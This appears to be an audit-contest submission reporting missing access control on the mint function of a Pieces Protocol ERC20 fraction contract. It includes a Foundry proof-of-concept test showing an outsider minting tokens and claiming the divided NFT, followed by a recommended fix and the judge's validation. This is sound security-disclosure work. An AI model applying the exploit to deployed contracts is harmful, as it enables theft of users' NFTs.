Pieces Protocol
First Flight #32
Beginner FriendlyFoundrySolidityNFT
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Missing access control for minting ERC20ToGenerateNftFraccion

0xdimo

Summary

The ERC20ToGenerateNftFraccion contract is used to mint ERC20s, which will serve as fractions for each of the NFTs divided in the contract. For every new incoming NFT, a new instance is deployed and used to track, which users have how many pieces of each NFT.

To mint the ERC20s, the mint function is used. The vulnerability is that it has no access modifier and everyone can mint and claim NFTs, which they shouldn't. This allows users at any time to steal NFTs and make the whole protocol useless.

PoC

function testAnyoneCanMintERC20s() public {
//NFT is divided by USER
vm.startPrank(USER);
erc721Mock.approve(address(tokenDivider), TOKEN_ID);
tokenDivider.divideNft(address(erc721Mock), TOKEN_ID, AMOUNT);
ERC20Mock erc20Mock = ERC20Mock(tokenDivider.getErc20InfoFromNft(address(erc721Mock)).erc20Address);
console.log("ERC20 Token addres is: ", address(erc20Mock));
vm.stopPrank();
//USER2 mints ERC20s and claims NFT
vm.startPrank(USER2);
ERC20ToGenerateNftFraccion(address(erc20Mock)).mint(USER2, AMOUNT);
tokenDivider.claimNft(address(erc721Mock));
vm.stopPrank();
assertEq(erc721Mock.ownerOf(TOKEN_ID), USER2);
}

Impact

Critical as it defies the whole purpose of the protocol

Tools Used

Manual Review

Recommendations

Add a modifier, to ensure only TokenDivider can call the mint function

Updates

Lead Judging Commences

fishy Lead Judge 5 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Lack of token access control chekcs

Any person can mint the ERC20 token generated in representation of the NFT

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.